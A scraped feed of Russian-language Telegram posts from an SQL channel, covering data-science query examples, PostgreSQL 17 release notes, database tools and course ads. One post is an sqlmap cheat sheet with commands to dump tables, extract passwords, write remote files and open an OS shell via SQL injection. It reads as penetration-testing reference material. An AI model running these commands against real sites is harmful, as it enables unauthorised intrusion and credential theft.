По всем вопросам- @workakkk @itchannels_telegram - 🔥лучшие ит-каналы @ai_machinelearning_big_data - Machine learning @pythonl - Python @pythonlbooks- python книги📚 @datascienceiot - ml книги📚 РКН: https://vk.cc/cIi9vo
🖥 Как эффективно использовать SQL для Data Science?
💡 SQL — это не только инструмент для создания и управления базами данных. Его мощь часто недооценивается в контексте Data Science. Давайте рассмотрим, как SQL может помочь на каждом этапе работы с данными и почему стоит изучить его глубже.
🔍 1. Предварительная обработка данных (Data Preprocessing)
Обычно данные находятся в сыром виде и требуют значительной очистки и приведения в нужный формат. SQL позволяет быстро выполнять объединения, группировки, фильтрацию и агрегацию данных без необходимости выгружать большие наборы данных в Python или R.
Пример:
-- Выбираем транзакции с суммой выше среднего и сгруппированные по пользователям
SELECT user_id, AVG(transaction_amount) AS avg_amount
FROM transactions
GROUP BY user_id
HAVING AVG(transaction_amount) > (
SELECT AVG(transaction_amount) FROM transactions
);
-- Количество покупок за последние 30 дней
SELECT user_id, COUNT(*) AS purchases_last_30_days
FROM purchases
WHERE purchase_date >= DATE_SUB(CURDATE(), INTERVAL 30 DAY)
GROUP BY user_id;
-- Построение 7-дневного скользящего среднего по продажам
SELECT
sales_date,
sales_amount,
AVG(sales_amount) OVER (ORDER BY sales_date ROWS BETWEEN 6 PRECEDING AND CURRENT ROW) AS moving_avg_7_days
FROM sales_data;
WITH monthly_sales AS (
SELECT
EXTRACT(MONTH FROM sales_date) AS month,
SUM(sales_amount) AS total_sales
FROM sales_data
GROUP BY EXTRACT(MONTH FROM sales_date)
)
SELECT
month,
total_sales,
LAG(total_sales) OVER (ORDER BY month) AS previous_month_sales,
total_sales - LAG(total_sales) OVER (ORDER BY month) AS growth
FROM monthly_sales;
🔐 Шпаргалка по использованию sqlmap
SQLMAP — это инструмент для проникновения с открытым исходным кодом.
SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
🌟 Базовый скан URL на наличие уязвимостей:
sqlmap -u "http://example.com/page.php?id=1"
sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"
sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user
sqlmap -u "http://example.com/page.php?id=1" --os-shell
sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"
sqlmap -u "http://example.com/page.php?id=1" --is-dba
sqlmap -u "http://example.com/page.php?id=1" --passwords
sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
sqlmap -u "http://example.com/page.php?id=1" --banner
sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"
🖥 SQL tips and tricks
Круташий набор лайфхаков и советов по улучшению SQL запросов.
В нём представлены методы повышения читаемости кода и предотвращения распространённых ошибок и рекомендации по оптимизации.
▪ Github
@sqlhub
🖥 Учебный курс «DBA2. Администрирование PostgreSQL 13. Настройка и мониторинг»
DBA2-13. 00. Введение
DBA2-13. 01. Изоляция
DBA2-13. 02. Страницы и версии строк
DBA2-13. 03. Снимки данных
DBA2-13. 04. HOT-обновления
DBA2-13. 05. Очистка
DBA2-13. 06. Автоочистка
DBA2-13. 07. Заморозка
DBA2-13. 08. Буферный кеш
DBA2-13. 09. Журнал предзаписи
DBA2-13. 10. Контрольная точка
DBA2-13. 11. Настройка журнала
DBA2-13. 12. Блокировки объектов
DBA2-13. 13. Блокировки строк
DBA2-13. 14. Блокировки в оперативной памяти
DBA2-13. 15. Управление расширениями
DBA2-13. 16. Локализация
DBA2-13. 17. Обновление сервера
▪Источник
@sqlhub
🖥 Phidias
Генеративная модель для создания 3D-контента из текста, изображения и 3D-условий с помощью диффузии с добавлением ссылок
https://huggingface.co/papers/2409.11406
@sqlhub
Продуктовые аналитики, это вам
В Т-Банке пройдет Week Offer для специалистов уровня middle и senior. Можете пройти все этапы собеседования за неделю и присоединиться к ИТ-команде.
Дальше будете выдвигать гипотезы, принимать решения на основе данных и влиять на продукты для миллионов. Рутинные задачи можно автоматизировать и полностью сосредоточиться на аналитике.
В компании используют актуальный стек. Будете работать с базами данных Greenplum, Hadoop, Hive, ClickHouse. Для визуализации использовать Tableau, Grafana, а разрабатывать — на Python, SQL.
Узнайте больше и успейте подать заявку до 25 сентября
7️⃣самых эффективных стратегий для масштабирования БД
🔵 Материализованные представления: Предварительно рассчитывайте результаты сложных запросов и сохраняйте их для быстрого доступа.
🔵 Денормализация: Упрощайте сложные соединения для повышения скорости выполнения запросов.
🔵 Вертикальное масштабирование: Увеличивайте ресурсы сервера (процессоры, оперативную память, хранилище) для улучшения производительности.
🔵 Индексация: Анализируйте запросы вашего приложения и создавайте подходящие индексы для ускорения работы.
🔵 Кэширование: Храните часто запрашиваемые данные в быстром хранилище, чтобы снизить нагрузку на базу данных.
🔵 Репликация: Создавайте копии основной базы данных на разных серверах для увеличения объема операций чтения.
🔵 Шардинг: Разделяйте таблицы на более мелкие части и распределяйте их по серверам для улучшения работы с записью и чтением.
@sqlhub
🖥 Интерактивная схема устройства работы векторных баз данных
@sqlhub
PGCONF.ACADEMY 2024 — первая конференция для преподавателей PostgreSQL в России
9 октября в Москве пройдет конференция для преподавателей системного программирования и дисциплин, связанных с системами управления базами данных (СУБД).
Организатор — компания Postgres Professional, ведущий российский СУБД-разработчик.
Темы встречи:
✔️Внедрение PostgreSQL и Postgres Pro в учебный процесс
✔️Обучение базам данных и системному программированию, автоматизация и использование интерактивных систем в учебе
✔️Научно-исследовательская и проектная работа студентов по теме СУБД
✔️Профессиональная сертификация специалистов по PostgreSQL и др.
Для кого? Специалисты в сфере ИТ-образования: преподаватели, методисты, сотрудники администрации вузов, колледжей и учебных центров.
Онлайн и офлайн: Москва, ИНТЦ МГУ «Воробьёвы горы», кластер «Ломоносов», Раменский бульвар, д. 1.
Регистрация — до 6 октября 2024 г.
🔥Участие для преподавателей, сотрудников администраций вузов и колледжей — бесплатное.
ЗАРЕГИСТРИРОВАТЬСЯ
💻 Valkey — это высокопроизводительное open-source хранилище данных, поддерживающее кэширование, очереди сообщений; может выступать в качестве основной базы данных
Также Valkey может работать как автономная фоновая служба или в кластере, с возможностью репликации и высокой доступности.
Valkey поддерживает множество типов данных, включая строки, числа, хэши, списки, наборы, сортированные наборы, растровые изображения и др.
Можно оперировать со структурами данных с помощью набора команд. Valkey также поддерживает встроенную поддержку сценариев на языке Lua и поддерживает модули-плагины для создания новых команд и типов данных.
🖥 GitHub
🟡 Доки
@sqlhub
💪 Качаем скиллы PostgreSQL!
17 сентября 2024 года пройдет бесплатное комьюнити-мероприятие из серии PG BootCamp Russia — конференция, направленная на приобретение практических навыков при работе с СУБД PostgreSQL.
🔵Программа рассчитана как на начинающих специалистов, так и на более опытных разработчиков, желающих углубить знания в части ядра и экосистемы продукта
🔵 Ведущие эксперты в области СУБД проведут мастер-классы и лекции по наиболее востребованным и интересным темам
🔵Для тех, кто не сможет присутствовать очно, предусмотрена онлайн-трансляция
🧑🎓 Все участники получат электронные сертификаты, подтверждающие приобретение новых знаний и навыков.
📌 Дата и время: 17 сентября, 9:00
Формат: офлайн/онлайн
Место проведения: отель «TASIGO Kazan Palace»
✅ Зарегистрируйтесь сейчас и приготовьтесь к захватывающему путешествию в мир СУБД!
Прокачайтесь в Data Science за 7 дней!🦾
Российская BI-платформа Analytic Workspace запустила бесплатный интенсив по ML-прогнозированию в AW BI «АНАЛИТИК 2.0».
🔥«АНАЛИТИК 2.0» — это 7 дней мощного погружения в Data Science вместе с топовыми экспертами — никаких скучных лекций, только практические занятия и реальные кейсы.
Всё, что нужно от вас: желание изучить ML-прогнозирование, базовые навыки SQL и визуализаций. Остальному научат: Python, Spark, ML. Сможете собирать обучающие датасеты, обучать ML-модели при помощи инструментов Data Science и применять их для прогнозирования в BI.
🚀А в финале интенсива состоится конкурс с призовым фондом 200 000 рублей. Конкурсанты получат кейс в портфолио, у финалистов будет еще и сертификат, который украсит резюме, а победители вдобавок ко всему заберут деньги.
Пройдя интенсив и погрузившись в Data Science — вы получите возможность выйти на новый уровень в карьере. BI-аналитики со знанием ML более востребованы на рынке, таких специалистов разбирают как «горячие пирожки». И зарплату предлагают вдвое больше, чем коллегами, которые ограничены только традиционными методами бизнес-анализа.
🔗Скорее регистрируйтесь по ссылке.
И становись экспертом, которого захотят «схантить» лучшие компании.
Реклама. Рекламодатель ИП Назаренко С.О.
ИНН: 183111053286
Как управлять ресурсами в ClickHouse?
🔹Научитесь управлять ресурсами и профилированием запросов в ClickHouse на открытом уроке от Otus. Практика поможет оптимизировать работу с базой данных, улучшить производительность запросов и эффективно управлять ресурсами системы.
✅ Практика: настройка квот, ограничений и профилей пользователей
Урок приурочен к курсу «ClickHouse для инженеров и архитекторов БД». Все о работе с ClickHouse: от установки и настройки, до продовых решений
👉 Регистрация и подробности:
https://otus.pw/CXtd/?erid=LjN8K1gPi
Когда ментор Слёрма Николай Марков решил стать Data-инженером, он не представлял, какие сюрпризы его ждут в профессии. А участники первого реалити-шоу про Data-инженеров уже успели прочувствовать эту атмосферу.
От неожиданных сбоев в коде до неуловимых багов — они испытали на себе вызовы, которые стоят за работой с большими данными. Кто смог раскрыть потенциал в нашей гонке, а кто слился после первых заданий?
👉🏻 Переходите, чтобы узнать, кто готов идти до конца и как стать Data-инженером
Внутри — гайд «Инструменты Data-специалиста», Roadmap для начинающего Data-инженера и ещё много полезного — статьи, ссылки, рекомендации и бесплатные вебинары 👉🏻 @gdedata
Реклама. ИП Аердинов Н.В. ИНН 638103515932 erid: LjN8K97oM
Всего одни выходные — и вот вы уже создаете пайплайны обработки данных в команде Авито. Получите ускоренный оффер в компанию на Data Weekend Offer!
Вас ждет:
— конкурентная зарплата, удаленка и дополнительные дни отпуска;
— возможность прокачать свой стек – настраивать инструменты обработки данных, автоматизировать механизмы, тестить гипотезы и улучшать пользовательский опыт;
— участие в разработке новых продуктов крупнейшего в мире сервиса объявлений;
— сильное IT-комьюнити, которое любит опенсорс.
Ищем специалистов с опытом. Выбирайте стрим — Python/SQL или Spark/Java/Scala — и регистрируйтесь до 1 октября: https://u.to/nfbkIA
🖥 Релиз СУБД PostgreSQL 17
После года разработки опубликована новая стабильная ветка СУБД PostgreSQL 17. Обновления для новой ветки будут выходить в течение пяти лет до ноября 2029 года. Поддержка PostgreSQL 12.x, самой старой из поддерживаемых веток, будет прекращена 14 ноября.
📌 Основные новшества:
- При выполнении операции VACUUM (сборка мусора, чистка и упаковка дискового хранилища) задействована новая структура данных, потребляющая до 20 раз меньше памяти. Переход на новую структуру позволил ускорить выполнение операций VACUUM и сократить потребление совместно используемых ресурсов.
- Продолжена оптимизация производительности ввода/вывода. Благодаря улучшению кода для обработки лога отложенной записи WAL удалось до двух раз повысить пропускную способность операций записи в системах с большим числом одновременно выполняемых запросов.
- Предложен новый интерфейс потокового ввода/вывода, позволивший повысить скорость последовательного перебора данных в таблицах и ускорить обновление статистики для планировщика запросов после выполнения операции ANALYZE.
- Повышена производительность запросов с выражением "IN", если в них используются индексы на базе структуры B-tree. Реализована возможность параллельного построения индексов BRIN (Block Range Index). В планировщике запросов оптимизированы проверки "NOT NULL" и ускорена обработка обобщённых табличных выражений (Common Table Expression, CTE) определяемых при помощи SQL-команды "WITH". Обеспечено использование векторных процессорных инструкций (SIMD) для ускорения некоторых вычислений, например, для ускорения функции bit_count задействованы инструкции AVX-512.
- Реализована поддержка новых возможностей для работы с форматом JSON, определённых в стандарте SQL/JSON. Добавлена функция JSON-TABLE для преобразования данных из формата JSON в обычные таблицы PostgreSQL, а также новые операторы jsonpath для преобразования данных JSON в родные для PostgreSQL типы данных. Предложены новые функции для создания (JSON, JSON_SCALAR и JSON_SERIALIZE) и запроса (JSON_EXISTS, JSON_QUERY и JSON_VALUE) данных в формате JSON.
- Расширены возможности SQL-команды "MERGE", позволяющей создавать условные SQL-выражения, объединяющие в одном выражении операции INSERT, UPDATE и DELETE. Добавлена поддержка выражения RETURNING, позволяющего вычислять и возвращать значения на основе добавленных, обновлённых или удалённых строк. Реализована поддержка обновления представлений.
@sqlhub
❓️ Ваших знаний в области управления базами данных не хватает для успешного выполнения рабочих задач и карьерного роста?
🚀 Всего за 4 месяца вы научитесь настраивать кластер PostgreSQL на оптимальную производительность, организовывать систему резервного копирования и оперативно решать проблемы сбоев, блокировок и deadlock. Вы сможете использовать индексы, джойны и статистику для оптимизации производительности, а также решать проблемы работы с большими объемами данных. Ваши знания и навыки позволят проектировать БД так, чтобы впоследствии не приходилось тушить пожары из-за не оптимально заложенных основ.
🚀💻🔥 Присоединяйтесь к курсу «PostgreSQL для администраторов баз данных и разработчиков». Решайтесь сейчас — до 30 сентября действует скидка 🤑🤑!
Забронировать место в группе по скидке: https://otus.pw/AUDB/?erid=LjN8KBPcJ
#реклама
О рекламодателе
Yandex Cloud открыла доступ к Yandex Cloud AI Studio – единой платформе для создания приложений на базе ИИ
Платформа объединяет все доступные ML-решения компании, включая генеративные нейросети: YandexGPT и YandexART. Единый интерфейс позволяет упростить разработку и ускорить запуск многофункциональных ИИ-приложений.
Чтобы писать меньше кода для интеграции нейросетей, разработчики могут воспользоваться SDK-библиотекой с готовыми примерами кода.
Также пользователи смогут тестировать ML-решения в AI Playground: в нем можно вести одновременно несколько диалогов, в каждом из которых сохраняется история обращений.
Читайте подробнее в статье.
🖥 Ползеная шпаргалка по SQL с примерами запросов
На это Гите есть практически все, что касается SQL, начиная от запросов к базе данных и создания таблиц и заканчивая соединением (joining) данных.
Информация представлена наглядно и очень доступно.
GitHub
@sqlhub
🖥 SQL для Data Science: ключевые вопросы с собеседований по разным уровням
Подборка важных SQL вопросов для разных уровней👇
🔹 Начинающие (0-2 года):
▪️ В чем разница между WHERE и HAVING?
▪️ Какие виды JOIN существуют в SQL?
🔹 Опытные (2-5 лет):
▪️ Запрос для поиска второй по величине зарплаты.
▪️ Оконные функции в SQL, пример с ROW_NUMBER().
🔹 Эксперты (5+ лет):
▪️ Как оптимизировать медленный запрос?
▪️ Когда использовать кластеризованные и некластеризованные индексы?
🖥 Ссылка
@sqlhub
Освойте универсальные навыки в мире цифровых профессий — научитесь работать с SQL, Python, Power BI и DataLens на бесплатном курсе от Нетологии. В результате вы:
— разберётесь в основах Python для анализа данных и узнаете, как извлекать информацию.
— научитесь делать запросы и отчёты с помощью SQL.
— сможете строить интерактивные дашборды в Power BI и DataLens.
Курс подойдёт новичкам и тем, кто хочет расширить свои навыки.
Присоединяйтесь бесплатно
Реклама. ООО "Нетология". Erid 2VSb5wd5PB6
💻 eralchemy — простой инструмент на Python для отрисовки взаимоотношений таблиц SQ
— pip install eralchemy
eralchemy — это генератор диаграмм для баз данных а также для различных объектов SQLAlchemy.
eralchemy работает с SQLAlchemy < 1.4, а также с версиями выше 1.4.
🖥 GitHub
@sqlhub
🖥 Крутая шпаргалка по SQL.
В ней, предоставлены основные примеры запросов, а также пояснения к ним на русском языке.
Сохраняйте, чтобы не потерять
#шпаргалка #sql
@sqlhub
✔️ Туториал: Использование PostgreSQL в качестве векторной базы данных для RAG.
В туториале показан пошаговый сценарий к созданию векторной базы данных в PostgreSQL для хранения фрагментов текста из нескольких статей Википедии. В нем описывается процесс встраивания фрагментов текста и их сохранения в базе данных вместе с соответствующим заголовком, текстом и URL-адресом статьи.
Также приведен пример, как использовать векторное сходство для поиска релевантного контекста из базы данных с учетом запроса пользователя. Как извлеченный контекст используется для дополнения исходного запроса, прежде чем он будет передан в LLM для создания окончательного инференса.
infoworld.com
@sqlhub
Если вы работаете в области данных, вам предстоит пройти собеседование по SQL
Вот несколько кратких советов которые вы должны знать на собеседовании по SQL.
Начинающим
- Уметь объяснить различные типы объединений. Иногда я видел, что этот вопрос задается рекрутерами в качестве отборочного, чтобы убедиться, что они хотят взять вас на работу.
- Знать, когда в порядке выполнения операций в SQL используется HAVING
, а когда WHERE
.
Mid
- Понимать, как использовать оператор CASE
внутри функции SUM или COUNT
- Знать, по крайней мере, 1-2 способа оптимизации запроса, и если вы решите, что одним из этих способов является создание индекса в таблице, то вы должны знать, какие плюсы и минусы есть у индекса.
Продвинутым
- Знать, как решить SQL задачу с использованием оконной функции и без нее.
- Понимать и уметь объяснить, что такое коррелированный подзапрос.
- Просто сошлитесь на то, что вы посмотрите на план выполнения запроса. Рекрутеры будут шокированы тем, что вы вообще знаете, что это такое.
@sqlhub
🖥 SQLFlow - отличный инструмент для визуализации SQL-запросов
Легкий и простой интрумент для визуализация связей и структур БД, поддерживающий более 20 разных БД.
▪DEMO
▪GitHub
@sqlhub
💻 GreptimeDB — облачная распределенная БД временных рядов с открытым исходным кодом; поддерживает PromQL/SQL/Python
GreptimeDB — это open-sorce БД временных рядов, ориентированная на эффективность, масштабируемость и аналитические возможности.
Особенности GreptimeDB:
— оптимизированная колоночная структура для работы с данными временных рядов; сжатие и хранение в различных системах хранения данных, в частности в облачных объектных хранилищах
— полностью открытая архитектура распределенного кластера, использующая мощь облачных вычислительных ресурсов
— встроенный SQL и PromQL для запросов, возможность использовать сценарии Python для решения сложных аналитических задач
Быстрый старт с Docker:docker run --rm --name greptime --net=host greptime/greptimedb standalone start
🖥 GitHub
🟡 Доки
@sqlhub
⚒️ Шардирование базы данных: шпаргалка для разработчика
👉 Источник
🖥 Neon
Neon - это бессерверная альтернатива AWS Aurora Postgres с открытым исходным кодом, написанная на Rust.
В инструменте поддерживается автомасштабирование, разделяет хранение и вычисления , перераспределяя данные по кластеру узлов.
🖥 Github
@sqlhub